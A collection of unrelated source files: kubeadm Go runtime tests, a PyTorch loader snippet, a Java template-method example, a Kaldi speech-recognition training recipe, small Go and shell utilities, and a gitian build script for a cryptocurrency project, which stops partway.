err = runtime.RemoveContainers(tc.containers)
if !tc.isError && err != nil {
t.Errorf("unexpected RemoveContainers errors: %v, criSocket: %s, containers: %v", err, tc.criSocket, tc.containers)
}
if tc.isError && err == nil {
t.Errorf("unexpected RemoveContainers success, criSocket: %s, containers: %v", tc.criSocket, tc.containers)
}
})
}
}
func TestPullImage(t *testing.T) {
fcmd := fakeexec.FakeCmd{
CombinedOutputScript: []fakeexec.FakeAction{
func() ([]byte, []byte, error) { return nil, nil, nil },
// If the pull fails, it will be retried 5 times (see PullImageRetry in constants/constants.go)
func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
func() ([]byte, []byte, error) { return nil, nil, nil },
// If the pull fails, it will be retried 5 times (see PullImageRetry in constants/constants.go)
func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
},
}
execer := fakeexec.FakeExec{
CommandScript: genFakeActions(&fcmd, len(fcmd.CombinedOutputScript)),
LookPathFunc: func(cmd string) (string, error) { return "/usr/bin/crictl", nil },
}
cases := []struct {
name string
criSocket string
image string
isError bool
}{
{"valid: pull image using CRI", "unix:///var/run/crio/crio.sock", "image1", false},
{"invalid: CRI pull error", "unix:///var/run/crio/crio.sock", "image2", true},
{"valid: pull image using docker", constants.DefaultDockerCRISocket, "image1", false},
{"invalid: docker pull error", constants.DefaultDockerCRISocket, "image2", true},
}
for _, tc := range cases {
t.Run(tc.name, func(t *testing.T) {
runtime, err := NewContainerRuntime(&execer, tc.criSocket)
if err != nil {
t.Fatalf("unexpected NewContainerRuntime error: %v, criSocket: %s", err, tc.criSocket)
}
err = runtime.PullImage(tc.image)
if !tc.isError && err != nil {
t.Errorf("unexpected PullImage error: %v, criSocket: %s, image: %s", err, tc.criSocket, tc.image)
}
if tc.isError && err == nil {
t.Errorf("unexpected PullImage success, criSocket: %s, image: %s", tc.criSocket, tc.image)
}
})
}
}
func TestImageExists(t *testing.T) {
fcmd := fakeexec.FakeCmd{
RunScript: []fakeexec.FakeAction{
func() ([]byte, []byte, error) { return nil, nil, nil },
func() ([]byte, []byte, error) { return nil, nil, &fakeexec.FakeExitError{Status: 1} },
func() ([]byte, []byte, error) { return nil, nil, nil },
func() ([]byte, []byte, error) { return nil, nil, &fakeexec.FakeExitError{Status: 1} },
},
}
execer := fakeexec.FakeExec{
CommandScript: genFakeActions(&fcmd, len(fcmd.RunScript)),
LookPathFunc: func(cmd string) (string, error) { return "/usr/bin/crictl", nil },
}
cases := []struct {
name string
criSocket string
image string
result bool
}{
{"valid: test if image exists using CRI", "unix:///var/run/crio/crio.sock", "image1", false},
{"invalid: CRI inspecti failure", "unix:///var/run/crio/crio.sock", "image2", true},
{"valid: test if image exists using docker", constants.DefaultDockerCRISocket, "image1", false},
{"invalid: docker inspect failure", constants.DefaultDockerCRISocket, "image2", true},
}
for _, tc := range cases {
t.Run(tc.name, func(t *testing.T) {
runtime, err := NewContainerRuntime(&execer, tc.criSocket)
if err != nil {
t.Fatalf("unexpected NewContainerRuntime error: %v, criSocket: %s", err, tc.criSocket)
}
result, err := runtime.ImageExists(tc.image)
if !tc.result != result {
t.Errorf("unexpected ImageExists result: %t, criSocket: %s, image: %s, expected result: %t", err, tc.criSocket, tc.image, tc.result)
}
})
}
}
func TestIsExistingSocket(t *testing.T) {
// this test is not expected to work on Windows
if runtime.GOOS == "windows" {
return
}
const tempPrefix = "test.kubeadm.runtime.isExistingSocket."
tests := []struct {
name string
proc func(*testing.T)
}{
{
name: "Valid domain socket is detected as such",
proc: func(t *testing.T) {
tmpFile, err := ioutil.TempFile("", tempPrefix)
if err != nil {
t.Fatalf("unexpected error by TempFile: %v", err)
}
theSocket := tmpFile.Name()
os.Remove(theSocket)
tmpFile.Close()
con, err := net.Listen("unix", theSocket)
if err != nil {
t.Fatalf("unexpected error while dialing a socket: %v", err)
}
defer con.Close()
if !isExistingSocket(theSocket) {
t.Fatalf("isExistingSocket(%q) gave unexpected result. Should have been true, instead of false", theSocket)
}
},
},
{
name: "Regular file is not a domain socket",
proc: func(t *testing.T) {
tmpFile, err := ioutil.TempFile("", tempPrefix)
if err != nil {
t.Fatalf("unexpected error by TempFile: %v", err)
}
theSocket := tmpFile.Name()
defer os.Remove(theSocket)
tmpFile.Close()
if isExistingSocket(theSocket) {
t.Fatalf("isExistingSocket(%q) gave unexpected result. Should have been false, instead of true", theSocket)
}
},
},
{
name: "Non existent socket is not a domain socket",
proc: func(t *testing.T) {
const theSocket = "/non/existent/socket"
if isExistingSocket(theSocket) {
t.Fatalf("isExistingSocket(%q) gave unexpected result. Should have been false, instead of true", theSocket)
}
},
},
}
for _, test := range tests {
t.Run(test.name, test.proc)
}
}
func TestDetectCRISocketImpl(t *testing.T) {
tests := []struct {
name string
existingSockets []string
expectedError bool
expectedSocket string
}{
{
name: "No existing sockets, use Docker",
existingSockets: []string{},
expectedError: false,
expectedSocket: constants.DefaultDockerCRISocket,
},
{
name: "One valid CRI socket leads to success",
existingSockets: []string{"/var/run/crio/crio.sock"},
expectedError: false,
expectedSocket: "/var/run/crio/crio.sock",
},
{
name: "Correct Docker CRI socket is returned",
existingSockets: []string{"/var/run/docker.sock"},
expectedError: false,
expectedSocket: constants.DefaultDockerCRISocket,
},
{
name: "CRI and Docker sockets lead to an error",
existingSockets: []string{
"/var/run/docker.sock",
"/var/run/crio/crio.sock",
},
expectedError: true,
},
{
name: "Docker and containerd lead to Docker being used",
existingSockets: []string{
"/var/run/docker.sock",
"/run/containerd/containerd.sock",
},
expectedError: false,
expectedSocket: constants.DefaultDockerCRISocket,
},
{
name: "A couple of CRI sockets lead to an error",
existingSockets: []string{
"/var/run/crio/crio.sock",
"/run/containerd/containerd.sock",
},
expectedError: true,
},
}
for _, test := range tests {
t.Run(test.name, func(t *testing.T) {
socket, err := detectCRISocketImpl(func(path string) bool {
for _, existing := range test.existingSockets {
if path == existing {
return true
}
}
return false
})
if (err != nil) != test.expectedError {
t.Fatalf("detectCRISocketImpl returned unexpected result\n\tExpected error: %t\n\tGot error: %t", test.expectedError, err != nil)
}
if !test.expectedError && socket != test.expectedSocket {
t.Fatalf("detectCRISocketImpl returned unexpected CRI socket\n\tExpected socket: %s\n\tReturned socket: %s",
test.expectedSocket, socket)
}
})
}
}
|
import torch
from torch.utils.data import DataLoader
from torchvision.transforms import Compose
# Assuming the ScienceDataset class and train_augment function are defined elsewhere
# Define the custom data loader
class ScienceDataLoader(DataLoader):
def __init__(self, dataset, batch_size):
super(ScienceDataLoader, self).__init__(dataset, batch_size=batch_size, shuffle=True)
# Set the batch size
batch_size = 1
# Set up the training dataset using ScienceDataset and train_augment
train_dataset = ScienceDataset(cfg, 'test', mode='train', transform=train_augment)
# Create a composed transformation if needed
# transform = Compose([train_augment, other_transforms])
# Initialize the data loader with the training dataset and batch size
train_loader = ScienceDataLoader(train_dataset, batch_size) |
public abstract class PastaDish {
public final void makeRecipe() {
boilWater();
addPasta();
addProtein();
addSouce();
}
private void boilWater() {
System.out.println("Boiling Water");//its same to all subclasses
}
protected abstract void addPasta();//this methods contents
protected abstract void addProtein();// always changing
protected abstract void addSouce();//via subclasses
}
|
#!/usr/bin/env bash
# 1v is as 1t, but using backstitch training with scale=1.0,interval=4, and
# num of epochs increased to 7
# ./local/chain/compare_wer_general.sh --looped exp/chain_cleaned/tdnn_lstm1e_sp_bi exp/chain_cleaned/tdnn_lstm1t_sp_bi
# System tdnn_lstm1t_sp_bi tdnn_lstm1v_sp_bi
# WER on dev(orig) 9.0 8.6
# [looped:] 9.0 8.7
# WER on dev(rescored) 8.4 8.3
# [looped:] 8.4 8.2
# WER on test(orig) 8.9 8.2
# [looped:] 8.9 8.3
# WER on test(rescored) 8.4 7.8
# [looped:] 8.4 7.8
# exp/chain_cleaned/tdnn_lstm1t_sp_bi: num-iters=253 nj=2..12 num-params=37.1M dim=40+100->3626 combine=-0.055->-0.055 xent:train/valid[167,252,final]=(-0.774,-0.655,-0.643/-0.928,-0.883,-0.873) logprob:train/valid[167,252,final]=(-0.063,-0.048,-0.046/-0.087,-0.089,-0.087)
# exp/chain_cleaned/tdnn_lstm1v_sp_bi: num-iters=444 nj=2..12 num-params=33.9M dim=40+100->3608 combine=-0.05->-0.05 xent:train/valid[295,443,final]=(-0.771,-0.622,-0.623/-0.865,-0.769,-0.768) logprob:train/valid[295,443,final]=(-0.054,-0.037,-0.037/-0.074,-0.064,-0.064)
set -e -o pipefail
# First the options that are passed through to run_ivector_common.sh
# (some of which are also used in this script directly).
stage=0
nj=30
decode_nj=30
min_seg_len=1.55
label_delay=5
xent_regularize=0.1
train_set=train_cleaned
gmm=tri3_cleaned # the gmm for the target data
num_threads_ubm=32
nnet3_affix=_cleaned # cleanup affix for nnet3 and chain dirs, e.g. _cleaned
# training options
chunk_left_context=40
chunk_right_context=0
chunk_left_context_initial=0
chunk_right_context_final=0
frames_per_chunk=140,100,160
num_epochs=7
alpha=1.0
back_interval=4
# decode options
frames_per_chunk_primary=$(echo $frames_per_chunk | cut -d, -f1)
extra_left_context=50
extra_right_context=0
extra_left_context_initial=0
extra_right_context_final=0
# The rest are configs specific to this script. Most of the parameters
# are just hardcoded at this level, in the commands below.
train_stage=-10
tree_affix= # affix for tree directory, e.g. "a" or "b", in case we change the configuration.
tdnn_lstm_affix=1v #affix for TDNN-LSTM directory, e.g. "a" or "b", in case we change the configuration.
common_egs_dir= # you can set this to use previously dumped egs.
remove_egs=true
test_online_decoding=false # if true, it will run the last decoding stage.
# End configuration section.
echo "$0 $@" # Print the command line for logging
. ./cmd.sh
. ./path.sh
. ./utils/parse_options.sh
if ! cuda-compiled; then
cat <<EOF && exit 1
This script is intended to be used with GPUs but you have not compiled Kaldi with CUDA
If you want to use GPUs (and have them), go to src/, and configure and make on a machine
where "nvcc" is installed.
EOF
fi
local/nnet3/run_ivector_common.sh --stage $stage \
--nj $nj \
--min-seg-len $min_seg_len \
--train-set $train_set \
--gmm $gmm \
--num-threads-ubm $num_threads_ubm \
--nnet3-affix "$nnet3_affix"
gmm_dir=exp/$gmm
ali_dir=exp/${gmm}_ali_${train_set}_sp_comb
tree_dir=exp/chain${nnet3_affix}/tree_bi${tree_affix}
lat_dir=exp/chain${nnet3_affix}/${gmm}_${train_set}_sp_comb_lats
dir=exp/chain${nnet3_affix}/tdnn_lstm${tdnn_lstm_affix}_sp_bi
train_data_dir=data/${train_set}_sp_hires_comb
lores_train_data_dir=data/${train_set}_sp_comb
train_ivector_dir=exp/nnet3${nnet3_affix}/ivectors_${train_set}_sp_hires_comb
for f in $gmm_dir/final.mdl $train_data_dir/feats.scp $train_ivector_dir/ivector_online.scp \
$lores_train_data_dir/feats.scp $ali_dir/ali.1.gz $gmm_dir/final.mdl; do
[ ! -f $f ] && echo "$0: expected file $f to exist" && exit 1
done
if [ $stage -le 14 ]; then
echo "$0: creating lang directory with one state per phone."
# Create a version of the lang/ directory that has one state per phone in the
# topo file. [note, it really has two states.. the first one is only repeated
# once, the second one has zero or more repeats.]
if [ -d data/lang_chain ]; then
if [ data/lang_chain/L.fst -nt data/lang/L.fst ]; then
echo "$0: data/lang_chain already exists, not overwriting it; continuing"
else
echo "$0: data/lang_chain already exists and seems to be older than data/lang..."
echo " ... not sure what to do. Exiting."
exit 1;
fi
else
cp -r data/lang data/lang_chain
silphonelist=$(cat data/lang_chain/phones/silence.csl) || exit 1;
nonsilphonelist=$(cat data/lang_chain/phones/nonsilence.csl) || exit 1;
# Use our special topology... note that later on may have to tune this
# topology.
steps/nnet3/chain/gen_topo.py $nonsilphonelist $silphonelist >data/lang_chain/topo
fi
fi
if [ $stage -le 15 ]; then
# Get the alignments as lattices (gives the chain training more freedom).
# use the same num-jobs as the alignments
steps/align_fmllr_lats.sh --nj 100 --cmd "$train_cmd" ${lores_train_data_dir} \
data/lang $gmm_dir $lat_dir
rm $lat_dir/fsts.*.gz # save space
fi
if [ $stage -le 16 ]; then
# Build a tree using our new topology. We know we have alignments for the
# speed-perturbed data (local/nnet3/run_ivector_common.sh made them), so use
# those.
if [ -f $tree_dir/final.mdl ]; then
echo "$0: $tree_dir/final.mdl already exists, refusing to overwrite it."
exit 1;
fi
steps/nnet3/chain/build_tree.sh --frame-subsampling-factor 3 \
--context-opts "--context-width=2 --central-position=1" \
--leftmost-questions-truncate -1 \
--cmd "$train_cmd" 4000 ${lores_train_data_dir} data/lang_chain $ali_dir $tree_dir
fi
if [ $stage -le 17 ]; then
mkdir -p $dir
echo "$0: creating neural net configs using the xconfig parser";
num_targets=$(tree-info $tree_dir/tree |grep num-pdfs|awk '{print $2}')
learning_rate_factor=$(echo "print (0.5/$xent_regularize)" | python)
mkdir -p $dir/configs
cat <<EOF > $dir/configs/network.xconfig
input dim=100 name=ivector
input dim=40 name=input
# please note that it is important to have input layer with the name=input
# as the layer immediately preceding the fixed-affine-layer to enable
# the use of short notation for the descriptor
fixed-affine-layer name=lda input=Append(-2,-1,0,1,2,ReplaceIndex(ivector, t, 0)) affine-transform-file=$dir/configs/lda.mat
# the first splicing is moved before the lda layer, so no splicing here
relu-renorm-layer name=tdnn1 dim=1024
relu-renorm-layer name=tdnn2 dim=1024 input=Append(-1,0,1)
fast-lstmp-layer name=lstm1 cell-dim=1024 recurrent-projection-dim=256 non-recurrent-projection-dim=256 decay-time=20 delay=-3
relu-renorm-layer name=tdnn3 dim=1024 input=Append(-3,0,3)
relu-renorm-layer name=tdnn4 dim=1024 input=Append(-3,0,3)
fast-lstmp-layer name=lstm2 cell-dim=1024 recurrent-projection-dim=256 non-recurrent-projection-dim=256 decay-time=20 delay=-3
relu-renorm-layer name=tdnn5 dim=1024 input=Append(-3,0,3)
relu-renorm-layer name=tdnn6 dim=1024 input=Append(-3,0,3)
fast-lstmp-layer name=lstm3 cell-dim=1024 recurrent-projection-dim=256 non-recurrent-projection-dim=256 decay-time=20 delay=-3
## adding the layers for chain branch
output-layer name=output input=lstm3 output-delay=$label_delay include-log-softmax=false dim=$num_targets max-change=1.5
# adding the layers for xent branch
# This block prints the configs for a separate output that will be
# trained with a cross-entropy objective in the 'chain' models... this
# has the effect of regularizing the hidden parts of the model. we use
# 0.5 / args.xent_regularize as the learning rate factor- the factor of
# 0.5 / args.xent_regularize is suitable as it means the xent
# final-layer learns at a rate independent of the regularization
# constant; and the 0.5 was tuned so as to make the relative progress
# similar in the xent and regular final layers.
output-layer name=output-xent input=lstm3 output-delay=$label_delay dim=$num_targets learning-rate-factor=$learning_rate_factor max-change=1.5
EOF
steps/nnet3/xconfig_to_configs.py --xconfig-file $dir/configs/network.xconfig --config-dir $dir/configs/
fi
if [ $stage -le 18 ]; then
if [[ $(hostname -f) == *.clsp.jhu.edu ]] && [ ! -d $dir/egs/storage ]; then
utils/create_split_dir.pl \
/export/b0{5,6,7,8}/$USER/kaldi-data/egs/tedlium-$(date +'%m_%d_%H_%M')/s5_r2/$dir/egs/storage $dir/egs/storage
fi
steps/nnet3/chain/train.py --stage $train_stage \
--cmd "$decode_cmd" \
--feat.online-ivector-dir $train_ivector_dir \
--feat.cmvn-opts "--norm-means=false --norm-vars=false" \
--chain.xent-regularize $xent_regularize \
--chain.leaky-hmm-coefficient 0.1 \
--chain.l2-regularize 0.00005 \
--chain.apply-deriv-weights false \
--chain.lm-opts="--num-extra-lm-states=2000" \
--egs.dir "$common_egs_dir" \
--egs.opts "--frames-overlap-per-eg 0" \
--egs.chunk-width "$frames_per_chunk" \
--egs.chunk-left-context "$chunk_left_context" \
--egs.chunk-right-context "$chunk_right_context" \
--egs.chunk-left-context-initial "$chunk_left_context_initial" \
--egs.chunk-right-context-final "$chunk_right_context_final" \
--trainer.num-chunk-per-minibatch 128,64 \
--trainer.frames-per-iter 1500000 \
--trainer.max-param-change 2.0 \
--trainer.num-epochs $num_epochs \
--trainer.deriv-truncate-margin 10 \
--trainer.optimization.shrink-value 0.99 \
--trainer.optimization.num-jobs-initial 2 \
--trainer.optimization.num-jobs-final 12 \
--trainer.optimization.initial-effective-lrate 0.001 \
--trainer.optimization.final-effective-lrate 0.0001 \
--trainer.optimization.momentum 0.0 \
--trainer.optimization.backstitch-training-scale $alpha \
--trainer.optimization.backstitch-training-interval $back_interval \
--cleanup.remove-egs "$remove_egs" \
--feat-dir $train_data_dir \
--tree-dir $tree_dir \
--lat-dir $lat_dir \
--dir $dir
fi
if [ $stage -le 19 ]; then
# Note: it might appear that this data/lang_chain directory is mismatched, and it is as
# far as the 'topo' is concerned, but this script doesn't read the 'topo' from
# the lang directory.
utils/mkgraph.sh --self-loop-scale 1.0 data/lang $dir $dir/graph
fi
if [ $stage -le 20 ]; then
rm $dir/.error 2>/dev/null || true
for dset in dev test; do
(
steps/nnet3/decode.sh --num-threads 4 --nj $decode_nj --cmd "$decode_cmd" \
--acwt 1.0 --post-decode-acwt 10.0 \
--extra-left-context $extra_left_context \
--extra-right-context $extra_right_context \
--extra-left-context-initial $extra_left_context_initial \
--extra-right-context-final $extra_right_context_final \
--frames-per-chunk "$frames_per_chunk_primary" \
--online-ivector-dir exp/nnet3${nnet3_affix}/ivectors_${dset}_hires \
--scoring-opts "--min-lmwt 5 " \
$dir/graph data/${dset}_hires $dir/decode_${dset} || exit 1;
steps/lmrescore_const_arpa.sh --cmd "$decode_cmd" data/lang data/lang_rescore \
data/${dset}_hires ${dir}/decode_${dset} ${dir}/decode_${dset}_rescore || exit 1
) || touch $dir/.error &
done
wait
if [ -f $dir/.error ]; then
echo "$0: something went wrong in decoding"
exit 1
fi
fi
if [ $stage -le 21 ]; then
# 'looped' decoding. we didn't write a -parallel version of this program yet,
# so it will take a bit longer as the --num-threads option is not supported.
# we just hardcode the --frames-per-chunk option as it doesn't have to
# match any value used in training, and it won't affect the results very much (unlike
# regular decoding)... [it will affect them slightly due to differences in the
# iVector extraction; probably smaller will be worse as it sees less of the future,
# but in a real scenario, long chunks will introduce excessive latency].
rm $dir/.error 2>/dev/null || true
for dset in dev test; do
(
steps/nnet3/decode_looped.sh --nj $decode_nj --cmd "$decode_cmd" \
--acwt 1.0 --post-decode-acwt 10.0 \
--extra-left-context-initial $extra_left_context_initial \
--frames-per-chunk 30 \
--online-ivector-dir exp/nnet3${nnet3_affix}/ivectors_${dset}_hires \
--scoring-opts "--min-lmwt 5 " \
$dir/graph data/${dset}_hires $dir/decode_looped_${dset} || exit 1;
steps/lmrescore_const_arpa.sh --cmd "$decode_cmd" data/lang data/lang_rescore \
data/${dset}_hires ${dir}/decode_looped_${dset} ${dir}/decode_looped_${dset}_rescore || exit 1
) || touch $dir/.error &
done
wait
if [ -f $dir/.error ]; then
echo "$0: something went wrong in decoding"
exit 1
fi
fi
if $test_online_decoding && [ $stage -le 22 ]; then
# note: if the features change (e.g. you add pitch features), you will have to
# change the options of the following command line.
steps/online/nnet3/prepare_online_decoding.sh \
--mfcc-config conf/mfcc_hires.conf \
data/lang_chain exp/nnet3${nnet3_affix}/extractor ${dir} ${dir}_online
rm $dir/.error 2>/dev/null || true
for dset in dev test; do
(
# note: we just give it "$dset" as it only uses the wav.scp, the
# feature type does not matter.
steps/online/nnet3/decode.sh --nj $decode_nj --cmd "$decode_cmd" \
--extra-left-context-initial $extra_left_context_initial \
--acwt 1.0 --post-decode-acwt 10.0 \
--scoring-opts "--min-lmwt 5 " \
$dir/graph data/${dset} ${dir}_online/decode_${dset} || exit 1;
steps/lmrescore_const_arpa.sh --cmd "$decode_cmd" data/lang data/lang_rescore \
data/${dset}_hires ${dir}_online/decode_${dset} ${dir}_online/decode_${dset}_rescore || exit 1
) || touch $dir/.error &
done
wait
if [ -f $dir/.error ]; then
echo "$0: something went wrong in decoding"
exit 1
fi
fi
exit 0
|
package main
import (
"flag"
"log"
"strings"
"github.com/andrewlader/go-tendo/tendo"
)
var path string
var languageType tendo.LanguageType
var logLevel tendo.LogLevel
func init() {
parseArguments()
}
func main() {
tendo := tendo.NewTendo(logLevel)
tendo.Inspect(path, languageType)
tendo.DisplayTotals()
}
func parseArguments() {
var logLevelFlag string
var languageTypeFlag string
var logLevelmapping = map[string]tendo.LogLevel{
"all": tendo.LogAll,
"trace": tendo.LogTrace,
"info": tendo.LogInfo,
"warnings": tendo.LogWarnings,
"errors": tendo.LogErrors,
}
var languageTypemapping = map[string]tendo.LanguageType{
"go": tendo.LanguageType(tendo.Golang),
"java": tendo.LanguageType(tendo.Java),
}
flag.StringVar(&path, "path", "./", "defines the path to walk")
flag.StringVar(&logLevelFlag, "log", "all", "defines the level for logging output")
flag.StringVar(&languageTypeFlag, "language", "go", "defines the programming language for the path")
flag.Parse()
languageType = tendo.LanguageType(languageTypemapping[languageTypeFlag])
logLevel = logLevelmapping[strings.ToLower(logLevelFlag)]
log.Printf("path: %s, language type: %s, log level: %s", path, languageTypeFlag, logLevelFlag)
}
|
script_dir=$(dirname "$(readlink -f "$0")")
export KB_DEPLOYMENT_CONFIG=$script_dir/../deploy.cfg
WD=/kb/module/work
if [ -f $WD/token ]; then
cat $WD/token | xargs sh $script_dir/../bin/run_DataFileUtil_async_job.sh $WD/input.json $WD/output.json
else
echo "File $WD/token doesn't exist, aborting."
exit 1
fi
|
#!/usr/bin/env bash
make --silent --no-print-directory -C .. all
for (( i=0; i<=100; i++ ))
do
if ! [ -f "inputs/input$i" ]; then
continue
fi
../hw2.exe <"inputs/input$i" >'test.out'
diff 'test.out' "outputs/output$i" >/dev/null
if [ $? -ne 0 ]; then
echo "input$i failed"
fi
done
make --silent --no-print-directory -C .. clean
|
#!/bin/bash
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# What to do
sign=false
verify=false
build=false
# Systems to build
linux=true
windows=true
osx=true
# Other Basic variables
SIGNER=
VERSION=
commit=false
url=https://github.com/netrumproject/netrum
proc=2
mem=2000
lxc=true
osslTarUrl=http://downloads.sourceforge.net/project/osslsigncode/osslsigncode/osslsigncode-1.7.1.tar.gz
osslPatchUrl=https://bitcoincore.org/cfields/osslsigncode-Backports-to-1.7.1.patch
scriptName=$(basename -- "$0")
signProg="gpg --detach-sign"
commitFiles=true
# Help Message
read -r -d '' usage <<- EOF
Usage: $scriptName [-c|u|v|b|s|B|o|h|j|m|] signer version
Run this script from the directory containing the netrum, gitian-builder, gitian.sigs, and netrum-detached-sigs.
Arguments:
signer GPG signer to sign each build assert file
version Version number, commit, or branch to build. If building a commit or branch, the -c option must be specified
Options:
-c|--commit Indicate that the version argument is for a commit or branch
-u|--url Specify the URL of the repository. Default is https://github.com/netrumproject/netrum
-v|--verify Verify the gitian build
-b|--build Do a gitian build
-s|--sign Make signed binaries for Windows and Mac OSX
-B|--buildsign Build both signed and unsigned binaries
-o|--os Specify which Operating Systems the build is for. Default is lwx. l for linux, w for windows, x for osx, a for aarch64
-j Number of processes to use. Default 2
-m Memory to allocate in MiB. Default 2000
--kvm Use KVM instead of LXC
--setup Setup the gitian building environment. Uses KVM. If you want to use lxc, use the --lxc option. Only works on Debian-based systems (Ubuntu, Debian)
--detach-sign Create the assert file for detached signing. Will not commit anything.
--no-commit Do not commit anything to git
-h|--help Print this help message
EOF
# Get options and arguments
while :; do
case $1 in
# Verify
-v|--verify)
verify=true
;;
# Build
-b|--build)
build=true
;;
# Sign binaries
-s|--sign)
sign=true
;;
# Build then Sign
-B|--buildsign)
sign=true
build=true
;;
# PGP Signer
-S|--signer)
if [ -n "$2" ]
then
SIGNER=$2
shift
else
echo 'Error: "--signer" requires a non-empty argument.'
exit 1
fi
;;
# Operating Systems
-o|--os)
if [ -n "$2" ]
then
linux=false
windows=false
osx=false
aarch64=false
if [[ "$2" = *"l"* ]]
then
linux=true
fi
if [[ "$2" = *"w"* ]]
then
windows=true
fi
if [[ "$2" = *"x"* ]]
then
osx=true
fi
if [[ "$2" = *"a"* ]]
then
aarch64=true
fi
shift
else
printf 'Error: "--os" requires an argument containing an l (for linux), w (for windows), x (for Mac OSX), or a (for aarch64)\n'
exit 1
fi
;;
# Help message
-h|--help)
echo "$usage"
exit 0
;;
# Commit or branch
-c|--commit)
commit=true
;;
# Number of Processes
-j)
if [ -n "$2" ]
then
proc=$2
shift
else
echo 'Error: "-j" requires an argument'
exit 1
fi
;;
# Memory to allocate
-m)
if [ -n "$2" ]
then
mem=$2
shift
else
echo 'Error: "-m" requires an argument'
exit 1
fi
;;
# URL
-u)
if [ -n "$2" ]
then
url=$2
shift
else
echo 'Error: "-u" requires an argument'
exit 1
fi
;;
# kvm
--kvm)
lxc=false
;;
# Detach sign
--detach-sign)
signProg="true"
commitFiles=false
;;
# Commit files
--no-commit)
commitFiles=false
;;
# Setup
--setup)
setup=true
;;
*) # Default case: If no more options then break out of the loop.
break
esac
shift
done
# Set up LXC
if [[ $lxc = true ]]
then
export USE_LXC=1
export LXC_BRIDGE=lxcbr0
sudo ifconfig lxcbr0 up 10.0.2.2
fi
# Check for OSX SDK
if [[ ! -e "gitian-builder/inputs/MacOSX10.11.sdk.tar.gz" && $osx == true ]]
then
echo "Cannot build for OSX, SDK does not exist. Will build for other OSes"
osx=false
fi
# Get signer
if [[ -n "$1" ]]
then
SIGNER=$1
shift
fi
# Get version
if [[ -n "$1" ]]
then
VERSION=$1
COMMIT=$VERSION
shift
fi
# Check that a signer is specified
if [[ $SIGNER == "" ]]
then
echo "$scriptName: Missing signer."
echo "Try $scriptName --help for more information"
exit 1
fi
# Check that a version is specified
if [[ $VERSION == "" ]]
then
echo "$scriptName: Missing version."
echo "Try $scriptName --help for more information"
exit 1
fi
# Add a "v" if no -c
if [[ $commit = false ]]
then
COMMIT="v${VERSION}"
fi
echo "${COMMIT}"
# Setup build environment
if [[ $setup = true ]]
then
sudo apt-get install ruby apache2 git apt-cacher-ng python-vm-builder qemu-kvm qemu-utils
git clone https://github.com/netrumproject/gitian.sigs.git
git clone https://github.com/netrumproject/netrum-detached-sigs.git
git clone https://github.com/devrandom/gitian-builder.git
pushd ./gitian-builder || exit
if [[ -n "$USE_LXC" ]]
then
sudo apt-get install lxc
bin/make-base-vm --suite trusty --arch amd64 --lxc
else
bin/make-base-vm --suite trusty --arch amd64
fi
popd || exit
fi
# Set up build
pushd ./netrum || exit
git fetch
git checkout "${COMMIT}"
popd || exit
# Build
if [[ $build = true ]]
then
# Make output folder
mkdir -p "./netrum-binaries/${VERSION}"
# Build Dependencies
echo ""
echo "Building Dependencies"
echo ""
pushd ./gitian-builder || exit
mkdir -p inputs
wget -N -P inputs $osslPatchUrl
wget -N -P inputs $osslTarUrl
make -C ../netrum/depends download SOURCES_PATH="$(pwd)/cache/common"
# Linux
if [[ $linux = true ]]
then
echo ""
echo "Compiling ${VERSION} Linux"
echo ""
./bin/gbuild -j ${proc} -m ${mem} --commit netrum=${COMMIT} --url netrum=${url} ../netrum/contrib/gitian-descriptors/gitian-linux.yml
./bin/gsign --signer $SIGNER --release ${VERSION}-linux --destination ../gitian.sigs/ ../netrum/contrib/gitian-descriptors/gitian-linux.yml
mv build/out/netrum-*.tar.gz build/out/src/netrum-*.tar.gz ../netrum-binaries/${VERSION}
fi
# Windows
if [[ $windows = true ]]
then
echo ""
echo "Compiling ${VERSION} Windows"
echo ""
./bin/gbuild -j ${proc} -m ${mem} --commit netrum=${COMMIT} --url netrum=${url} ../netrum/contrib/gitian-descriptors/gitian-win.yml
./bin/gsign --signer $SIGNER --release ${VERSION}-win-unsigned --destination ../gitian.sigs/ ../netrum/contrib/gitian-descriptors/gitian-win.yml
mv build/out/netrum-*-win-unsigned.tar.gz inputs/netrum-win-unsigned.tar.gz
mv build/out/netrum-*.zip build/out/netrum-*.exe ../netrum-binaries/${VERSION}
fi
# Mac OSX
if [[ $osx = true ]]
then
echo ""
echo "Compiling ${VERSION} Mac OSX"
echo ""
./bin/gbuild -j ${proc} -m ${mem} --commit netrum=${COMMIT} --url netrum=${url} ../netrum/contrib/gitian-descriptors/gitian-osx.yml
./bin/gsign --signer $SIGNER --release ${VERSION}-osx-unsigned --destination ../gitian.sigs/ ../netrum/contrib/gitian-descriptors/gitian-osx.yml
mv build/out/netrum-*-osx-unsigned.tar.gz inputs/netrum-osx-unsigned.tar.gz
mv build/out/netrum-*.tar.gz build/out/netrum-*.dmg ../netrum-binaries/${VERSION}
fi
# AArch64
if [[ $aarch64 = true ]]
then
echo ""
echo "Compiling ${VERSION} AArch64"
echo ""
./bin/gbuild -j ${proc} -m ${mem} --commit netrum=${COMMIT} --url netrum=${url} ../netrum/contrib/gitian-descriptors/gitian-aarch64.yml
./bin/gsign --signer $SIGNER --release ${VERSION}-aarch64 --destination ../gitian.sigs/ ../netrum/contrib/gitian-descriptors/gitian-aarch64.yml
mv build/out/netrum-*.tar.gz build/out/src/netrum-*.tar.gz ../netrum-binaries/${VERSION}
fi
popd || exit
if [[ $commitFiles = true ]]
then
# Commit to gitian.sigs repo
echo ""
echo "Committing ${VERSION} Unsigned Sigs"
echo ""
pushd gitian.sigs || exit
